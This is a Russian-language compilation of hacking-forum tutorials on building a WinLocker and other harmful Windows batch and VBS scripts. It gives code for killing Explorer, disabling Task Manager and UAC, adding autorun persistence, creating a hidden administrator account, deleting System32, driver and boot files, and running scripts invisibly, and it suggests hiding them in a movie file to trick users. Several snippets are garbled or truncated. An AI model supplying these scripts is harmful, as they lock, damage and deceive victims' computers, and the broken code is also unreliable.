Пишем свой простенький WinLocker
PIRATIKA
Привет, славянин. Сегодня будем писать простенький винлокер через блокнот))))) Ладно не буду тратить время скрипт-кидди,а сразу перпейдем.
Начинаем!
Сначала необходимо определелиться,где будем писать винлокер, какмногие поняли это будет обычный блокнот.
Необходимо открыть блокнот, делается это через поиск, вписываем туда «Блокнот» и запускаем.
Далее надо всего-лишь скопировать код ниже и вставить.
@echo off chcp 65001 taskkill /im explorer.exe /f >nul Title Winlocker color 0c echo Windows Заблокирован! echo Для разблокировки echo Надо пососать: :h set /p x= if %x%==169171199111 (echo win start start explorer exit ) else ( echo Неправильный пароль! ) goto h
Этот код надо будет вставить в блокнот.
Сейчас кратко поясню, что за что отвечает.
сhcp 65001 — отвечает за язык, то есть сейчас стоит русский
tasskill /im explorer.exe /f >nul — отвечает за то чтобы експлорер работал
Tittle Winlocker — Название
color 0c — ЦВЕТ заднего фона
echo — вывод на экран
if %x%==1691171199111 (echo win start — Пароль
Теперь надо сохранить ваш файл, не забудьте добавить расширение .bat
Как выйти?
Жмём Tab + Alt Диспетчер задач, и выходим
всем спасибо, я заебався
Вирусы в блокноте. Они не так слабы, как кажутся. Убиваем систему, искажаем мышь, блокируем программы и т.д.
Хочется сразу отметить, что некоторые bat-ники выполняют свою роль без каких-либо дополнительных действий, некоторые — требуют прав администратора при запуске, некоторые — перезагрузку для применения изменений. Также не все они невидимы для антивируса, некоторые — да, некоторые — нет.
Внизу иногда буду указывать два параметра «(перезагрузка, админ)». Это означает, что для вступления изменений в силу нужно, чтобы bat запускался от имени администратора (как сделать, чтобы он сам выполнялся от админа напишу только в своем телеграмме) и чтобы пользователь перезагрузил ПК
Как запускать bat-ники максимально незаметно (без мелькания cmd)
Если нужно, чтобы bat-ник запускался максимально незаметно и не смущал пользователя появившейся командной строкой (на небольшое время, но это окно промелькнет), то самым простым решением будет данный vbs скрипт (скопировать в блокнот и сохранить как «Все файлы» с указание расширения vbs):
Set WshShell = CreateObject(«WScript.Shell»)
WshShell.Run «путь к bat-файлу», 0, false
Этот скрипт запустит bat-ник, который расположен по указанному пути.
Также не стоит забывать прописывать в начале каждого bat-ника:
Меняем местами значение кнопок мыши
%SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul
Выключение
shutdown /p (немедленное выключение)
shutdown.exe -s -t 45 (выключение с задержкой, после -t время в секундах)
А если немного улучшить этот bat и добавить его в автозагрузку (команда есть ниже), то получится нечто веселое
Перезагрузка
shutdown /r /t 1
Отключение редактирования меню Пуск
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoChangeStartMenu /t REG_DWORD /d 1 /f >nul
(перезагрузка, админ)
Отключение рабочего стола
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f >nul
(перезагрузка, админ)
Отключаем интернет
Ipconfig /release
Чтобы вернуть назад прописываем в cmd: IPconfig /renew
Меняем расширение всех ярлыков на txt
assoc .lnk=.txt
Добавление файла в автозагрузку
copy «»%0″» «путь к файлу»
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v «имя в реестре(любое)» /t REG_SZ /d «путь к файлу» /f
copy «»%0″» «C:\Users\user\Desktop\re.bat»
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v «Filel» /t REG_SZ /d «C:\Users\user\Desktop\re.bat» /f
(перезагрузка, админ)
Отключение диспетчера задач
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f >nul
(перезагрузка, админ)
Запрещаем запуск программ
Добавляйте свои по желанию
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun /v «2» /t reg_sz /d «exe-шник программы» /f
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v «DisallowRun» /t REG_DWORD /d «1» /f
Например, чтобы запретить запуск Chrome:
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun /v «3» /t reg_sz /d «chrome.exe» /f
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v «DisallowRun» /t REG_DWORD /d «1» /f
(перезагрузка, админ)
Запрещаем установку программ
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun /v «1» /t reg_sz /d «msiexec.exe» /f
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v «DisallowRun» /t REG_DWORD /d «1» /f
(перезагрузка, админ)
Убираем панель управления
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v «DisableTaskMgr» /t REG_DWORD /d «1» /f
(перезагрузка, админ)
Отключить автозагрузку USB-устройств, приводов, съемных дисков, сетевых дисков
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer /v «NoDriveTypeAutoRun» /t REG_DWORD /d » 0xFF» /f
(перезагрузка, админ)
Как сделать самоуничтожающийся bat
В самом конце дописываем
del %0
Как запускать bat от имени администратора
Первый способ: через JScript-вставку без создания вспомогательного файла:
@set @x=0; /* @echo off ver |>NUL find /v "5." && if "%~1"=="" cscript.exe //nologo //e:jscript "%~f0"& exit /b :: ::Второй способ: с использованием внешнего VBScript-сценария.
Приведенный пример создает временный VBS-скрипт, через который методом ShellExecute, verb - runas запускает повторно BAT-файл с повышенными правами.
@echo off ver |>NUL find /v "5." && if "%~1"=="" ( Echo CreateObject^("Shell.Application"^).ShellExecute WScript.Arguments^(0^),"1","","runas",1 >"%~dp0Elevating.vbs" cscript.exe //nologo "%~dp0Elevating.vbs" "%~f0"& goto :eof ) :: ::Третий способ: с использованием mshta
@echo off reg.exe query "HKU\S-1-5-19">nul 2>&1 if %errorlevel% equ 1 goto UACPrompt :: :: nul exit /b :UACPrompt mshta "vbscript:CreateObject("Shell.Application").ShellExecute("%~fs0", "", "", "runas", 1) & Close()" exit /bСкоре всего во всех трех случаях у пользователя появится окно кнотроля учетных записей с требованием подтвердить операцию.
Контроль учетных записей можно отключить при помощи этого
REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /fСоздаем нового пользователя, с правами администратора, логин:plana и пароль boom:
@Echo off chcp 1251 net user SUPPORT_388945a0 /delete net user plana boom /add net localgroup Администраторы plana /add net localgroup Пользователи SUPPORT_388945a0 /del reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList" /v "support" /t reg_dword /d 0 yБыстро форматируем диски
@Echo off Option Explicit Dim WSHShell Set WSHShell=Wscript.CreateObject(“Wscript.Shell”) Dim x For x = 1 to 100000000 WSHShell.Run “Tourstart.exe” NextУдаляем все драйвера
@Echo off del "%SystemRoot%Driver Cachei386driver.cab" /f /q >nulОткрываем бесконечное количество Paint:
@Echo off :x Start mspaint goto xОткрываем бесконечное количество калькуляторов:
@Echo off :A start calc.exe goto AСбой системы
@Echo off rundll32 user,disableoemlayerТрюки в блокноте
Убежище
Покажу что можно сделать с обычным блокнотом на твоем компьютере.
Больше полезной информации у нас в магазине: @DBmarketbot
ВАЖНО: Если я случайно написал где-то тире вместо минуса в коде,то поменяйте на минус. Вам выдаст ошибку при запуске и номер строки,где находиться данная ошибка. Но вроде все в порядке. Так что просто копируйте!
ВАЖНО: Чтобы отключить скрипт необходимо в процессах (вкладка в диспетчере задач) завершить wscript.exe
Итак, вот 15 классных трюков блокнота, которые вы должны попробовать:
1. Постоянно выдвигайте CD-привод с помощью блокнота
Тебе не кажется, что было бы весело, если бы ты мог играть со своим другом, снова и снова заставляя его CD-привод? Просто введите текст ниже в блокнот и сохраните его в виде файла .vbs . Дважды щелкните файл .vbs, чтобы увидеть его работу.
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
For i = 0 to colCDROMs.Count - 1
2. Завершение работы компьютера с помощью блокнота
Представьте, что вместо того, чтобы нажимать кнопку «Пуск», затем кнопку «Завершение работы» и затем кнопку «ОК», вы можете просто дважды щелкнуть значок, чтобы выключить систему. Код трюка Блокнота, написанный ниже, делает именно это. Просто сохраните файл как файл .vbs и нажмите его, когда вам нужно завершить работу системы.
msg * System will now shut down
shutdown -c “Bye!” -s
3. Постоянно открывайте Блокнот на компьютере вашего друга
Еще один трюк с блокнотом, чтобы поиграть с системой вашего друга, состоит в том, чтобы запустить команду, которая будет периодически открывать его / ее блокнот.
4. Сделать личный журнал или дневник
Специальная функция, которая позволяет нам сделать журнал, существует в блокноте. Используя его, мы можем создавать журналы вещей, так как блокнот будет указывать дату и время для нас всякий раз, когда мы открываем определенный тип файла журнала. Для этого просто введите « .LOG » в блокноте и сохраните его под любым именем. Теперь, когда бы вы ни открывали этот конкретный файл, вы увидите, что блокнот автоматически вводит дату и время его открытия, а затем вы можете сделать запись в журнале и сохранить журнал.
5. Матричный эффект
Теперь мы обсудим трюк с Блокнотом, который может превратить нашу командную строку в нечто, похожее на то, что оно только что вышло из фильма матрицы, или, может быть, что-то похожее на что-то прямо из системы хакера. Для этого все, что вам нужно сделать, это вставить следующий код в блокноте
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
Теперь вам нужно сохранить этот файл с расширением .bat, и после нажатия на файл .bat, который вы создали, вы увидите нечто подобное.
Небольшая настройка для настройки этого крутого эффекта заключается в том, что вы можете изменить значение перед цветом, то есть 02 в цвете 02, на любое другое значение, например, например, на 03; это изменит цвет текста, который появляется в командной строке.
6. Несколько раз переключите Capslock, используя Блокнот
Вы можете играть с чьим-то компьютером или, возможно, с вашим собственным компьютером, написав скрипт, который может неоднократно переключать Caps Lock.
Просто скопируйте и вставьте код, записанный ниже, в блокнот.
Set wshShell =wscript.CreateObject("WScript.Shell")
Теперь сохраните его как файл .vbs и используйте его, чтобы увидеть магию.
7. печатать медленно
Это трюк, который заставит текст печататься медленно, попробуйте, просто скопируйте и вставьте текст ниже в блокнот и сохраните его как файл .vbs .
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.SendKeys "I a"
8. Преобразование текста в речь с помощью блокнота.
Просто скопируйте и вставьте код внизу в блокнот и сохраните как файл .vbs . Когда вы играете в нее, вы получите диалоговое окно с вопросом, что вы хотите сказать компьютеру. Повеселись.
Dim message, sapi
message=InputBox("What do you want me to say?", "Speak to Me")
9. Удаление загрузочных файлов с помощью блокнота
Один из способов уничтожить компьютер - удалить файлы, которые помогают ему запустить компьютер. Хотя это не рекомендуется, это код, который имеет право сделать это.
ATTRIB -R -S -HC:\AUTOEXEC.BAT
ATTRIB -R -S -HC:\BOOT.INI
ATTRIB -R -S -HC:\NTLDR
ATTRIB -R -S -HC:\WINDOWS\WIN.INI
SAVE IT AS .BAT FILE.
Это выключит компьютер и удалит файлы, необходимые для приведения компьютера в нормальное состояние.
Не пытайтесь делать это на вашем компьютере до тех пор, пока вы не захотите потерять все свои данные.
10. Удаление файлов System32 с помощью блокнота
Хотите отомстить кому-то? Просто используйте этот код, сохраните его как файл .bat и посмотрите, что он делает с системой этого человека. Это удалит все файлы System32, необходимые для работы системы в порядке.
Просто вставьте следующее в блокнот и сохраните его как файл .bat.
11. Хит Enter непрерывно
Что, если мы хотим, чтобы функция нашей кнопки ввода повторялась снова и снова, лучше, чем нажимать ее снова и снова, - использовать приведенный ниже код
Set wshShell = wscript.CreateObject("WScript.Shell")
Сохраните его как файл .vbs и посмотрите его волшебство
12. Набирать что-то снова и снова
Код для ввода чего-либо снова и снова упоминается ниже, вы можете использовать его для записи чего-либо снова и снова и снова, пока не выйдете из цикла.
Set wshShell = wscript.CreateObject("WScript.Shell")
wshshell.sendkeys "I'll be typed again and again"
сохраните его как файл .vbs, чтобы он работал.
13. Краш компьютера
Выводит на экран сообщение о том что система заражена и просит перезагрузить компьютер, а затем включает много командных строк, калькуляторы, блокноты и многое другое.
Скрипт:
on error resume next set t=createobject("Wscript.Shell") set kill = createobject("wscript.shell") kill.run"taskkill /f /im explorer.exe",0 msgbox"Неполадка системы",16,"Error" msgbox"Вы заражены вирусом",48,"Windows" msgbox"Необходим перезапуск системы",16,"Windows" t.run"help" t.run"help" t.run"help" t.run"help" t.run"calc.exe" t.run"notepad.exe" t.run"telnet" t.run"help" t.run"explorer" t.run"help" t.run"help" t.run"help" t.run"help" t.run"help" t.run"help" t.run"calc.exe" t.run"notepad.exe" t.run"telnet" t.run"help" t.run"help" msgbox"Сбой системы",16,"Windows" t.run"help" t.run"help" t.run"help" t.run"help" t.run"help" t.run"help" t.run"help" t.run"calc.exe" t.run"notepad.exe" t.run"telnet" t.run"help" t.run"explorer" t.run"help" t.run"help" t.run"help" t.run"help" t.run"help" t.run"help" t.run"calc.exe" t.run"notepad.exe" t.run"telnet" t.run"help" t.run"help" msgbox"Сбой системы",16,"Windows" t.run"help" t.run"help" t.run"help" t.run"help" t.run"help" t.run"help" t.run"help" t.run"calc.exe" t.run"notepad.exe" t.run"telnet" t.run"help" t.run"explorer" t.run"help" t.run"help" t.run"help" t.run"help" t.run"help" t.run"help" t.run"calc.exe" t.run"notepad.exe" t.run"telnet" t.run"help" t.run"help" msgbox"Сбой системы",16,"Windows" t.run"help" t.run"help" t.run"help"14. Бесконечно пищащий системный динамик
vbs скрипт заставляет бесконечно пищать системный динамик в процессоре компьютера
Скрипт:
Set S = CreateObject("Wscript.Shell") do execute"S.Run ""%comspec% /c "" & Chr(7), 0,True" loop15. Бесконечно жужжащий разъем для дискет
Имитирует, что в приводе для дискет находится дискета. Заставляет его жужжать.
Set WSHShell=WScript.CreateObject("WScript.Shell") Sub Zapadlo(Fuck,Wait) Set WshShell=WScript.CreateObject("WScript.Shell") C=WshShell.Run(Fuck,Wait) End Sub do Call Zapadlo("A:\",true) loopДумаю вы знаете, как можно их применить на практике.Самое простое это
собрать в Bat to exe convert единый файл.К примеру вставить любой скрипт
в какой нибудь фильм и запустить.Будет очень интересно смотреть на реакцию обычного юзера.КАК СОЗДАТЬ WINLOCKER В БЛОКНОТЕ ЗА 5 МИНУТ. РАБОЧИЙ СПОСОБ.
● В этом видео я вам расскажу и покажу КАК СОЗДАТЬ WINLOCKER (блокировка Windows) В БЛОКНОТЕ ЗА 5 МИНУТ. Способ конечно-же работал, работает, и будет работать. ● ►Скрипт который вам понадобится:◄ Do msgbox"Это Petya, тебе конец!",48,"LOL" x = inputbox("Ну чё вводи пароль") if (x = "pranton") then msgbox"Кросс",64,"Pranton" exit do else msgbox"Неверный пароль, Windows будет заблокирован",48,"LOL" end if loop
Показать больше
Войдите , чтобы оставлять комментарии